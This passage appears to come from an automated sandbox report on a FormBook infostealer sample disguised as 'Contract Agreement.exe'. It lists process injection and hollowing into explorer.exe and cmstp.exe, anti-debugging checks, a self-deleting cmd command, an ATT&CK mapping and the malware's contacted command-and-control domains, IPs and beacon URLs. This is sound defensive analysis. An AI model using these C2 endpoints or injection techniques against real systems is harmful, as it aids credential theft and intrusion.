          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0478C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0478C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0470849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04717D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04733D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04773540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047A3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0477A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047BE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04724D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04724D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04724D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046FAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047A8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0470D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0470D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04721DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04721DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04721DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047235A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04722581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04722581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04722581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.protocolmodern.com
          Source: C:\Windows\explorer.exeNetwork Connect: 142.111.179.147 80
          Source: C:\Windows\explorer.exeNetwork Connect: 72.52.251.1 80
          Source: C:\Windows\explorer.exeDomain query: www.nyariorganics.com
          Source: C:\Windows\explorer.exeDomain query: www.bizcert360.com
          Source: C:\Windows\explorer.exeDomain query: www.sapanyc.com
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 0_2_6FC71000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Contract Agreement.exeSection loaded: unknown target: C:\Users\user\Desktop\Contract Agreement.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Contract Agreement.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Contract Agreement.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Contract Agreement.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Contract Agreement.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Contract Agreement.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Contract Agreement.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 310000
          Source: C:\Users\user\Desktop\Contract Agreement.exeProcess created: C:\Users\user\Desktop\Contract Agreement.exe 'C:\Users\user\Desktop\Contract Agreement.exe'
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Contract Agreement.exe'
          Source: explorer.exe, 00000003.00000000.653398591.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000003.00000002.907549316.0000000001080000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.665606010.0000000005E50000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.907549316.0000000001080000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.907549316.0000000001080000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.669566755.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Contract Agreement.exe.1eda0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Contract Agreement.exe.1eda0000.2.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Contract Agreement.exe.1eda0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Contract Agreement.exe.1eda0000.2.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery141Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection612Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 385426 Sample: Contract Agreement.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 7 other signatures 2->42 10 Contract Agreement.exe 18 2->10         started        process3 file4 28 C:\Users\user\AppData\Local\...\1hqxmv.dll, PE32 10->28 dropped 52 Maps a DLL or memory area into another process 10->52 14 Contract Agreement.exe 10->14         started        signatures5 process6 signatures7 54 Modifies the context of a thread in another process (thread injection) 14->54 56 Maps a DLL or memory area into another process 14->56 58 Sample uses process hollowing technique 14->58 60 Queues an APC in another process (thread injection) 14->60 17 explorer.exe 14->17 injected process8 dnsIp9 30 bizcert360.com 72.52.251.1, 49756, 80 LIQUIDWEBUS United States 17->30 32 www.sapanyc.com 142.111.179.147, 49750, 80 EGIHOSTINGUS United States 17->32 34 3 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 cmstp.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Contract Agreement.exe21%ReversingLabsWin32.Trojan.SpyNoon

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsg2E21.tmp\1hqxmv.dll4%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.Contract Agreement.exe.1eda0000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.Contract Agreement.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.cmstp.exe.4bff834.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          4.2.cmstp.exe.5bbc70.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.Contract Agreement.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.sapanyc.com/klf/?bl=VTChTP0hZXHDb84&Y4pTrva=ZAijfgstlYq8fKC0iYK9133s/sVwbQ6uXCBDF/fP0oHXHYAEtG3x8g/iP6moTRr8/loA0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          www.middlehambooks.com/klf/0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.bizcert360.com/klf/?Y4pTrva=l4OXKFqiDRIL5M7Qs3ptSHdfRIx3aIBnF9VcnLQHKrQrW9fnriE9a3t8qZQrlYiaWXmB&bl=VTChTP0hZXHDb840%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          bizcert360.com
          		72.52.251.1
          		truetrue
            		unknown
            www.sapanyc.com
            		142.111.179.147
            		truetrue
              		unknown
              www.protocolmodern.com
              		unknown
              		unknowntrue
                		unknown
                www.nyariorganics.com
                		unknown
                		unknowntrue
                  		unknown
                  www.bizcert360.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.sapanyc.com/klf/?bl=VTChTP0hZXHDb84&Y4pTrva=ZAijfgstlYq8fKC0iYK9133s/sVwbQ6uXCBDF/fP0oHXHYAEtG3x8g/iP6moTRr8/loAtrue
                    • Avira URL Cloud: safe
                    		unknown
                    www.middlehambooks.com/klf/true
                    • Avira URL Cloud: safe
                    		low
                    http://www.bizcert360.com/klf/?Y4pTrva=l4OXKFqiDRIL5M7Qs3ptSHdfRIx3aIBnF9VcnLQHKrQrW9fnriE9a3t8qZQrlYiaWXmB&bl=VTChTP0hZXHDb84true
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.comexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                              		high
                              http://www.tiro.comexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                		high
                                http://www.goodfont.co.krexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.carterandcone.comlexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
